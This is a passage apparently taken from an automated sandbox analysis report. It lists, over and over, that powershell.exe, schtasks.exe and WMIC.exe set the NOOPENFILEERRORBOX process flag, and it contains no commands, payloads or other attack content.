    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
